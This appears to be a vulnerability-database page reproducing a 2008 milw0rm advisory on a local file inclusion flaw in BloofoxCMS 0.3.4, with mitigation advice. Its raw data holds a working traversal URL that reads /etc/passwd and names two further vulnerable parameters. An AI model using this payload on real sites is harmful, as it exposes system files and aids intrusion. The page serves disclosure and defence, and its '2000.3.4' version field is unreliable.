header-logo
Suggest Exploit
vendor:
BloofoxCMS
by:
milw0rm.com
7.5
CVSS
HIGH
File Inclusion
22
CWE
Product Name: BloofoxCMS
Affected Version From: 2000.3.4
Affected Version To: 2000.3.4
Patch Exists: NO
Related CWE:
CPE: a:bloofox:bloofox_cms:0.3.4
Metasploit:
Other Scripts:
Platforms Tested:
2008

BloofoxCMS 0.3.4 File Inclusion Vulnerability

The vulnerability exists in the dialog.php file of BloofoxCMS 0.3.4, which allows an attacker to include arbitrary files from the server by manipulating the 'lang' parameter. By using directory traversal techniques, an attacker can include sensitive files such as /etc/passwd. This can lead to further exploitation of the system.

Mitigation:

It is recommended to upgrade to a newer version of BloofoxCMS that includes a patch for this vulnerability. Additionally, enabling PHP's 'magic_quotes_gpc' and disabling 'register_globals' can help mitigate the risk of file inclusion vulnerabilities.
Source

Exploit-DB raw data:

BloofoxCMS 0.3.4
http://www.bloofox.com/

magic_quotes_gpc = Off
register_globals = On

- File Inclusion -
http://site/bloofoxCMS_0.3.4/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00

Also vulnerable:
dialog.php?theme=<lfi>
dialog.php?dialog=foo&module=<lfi>

- Seasons Greetings -
- http://nukeit.org -

# milw0rm.com [2008-12-24]

Navigation

Suggest Exploit

Services By CQR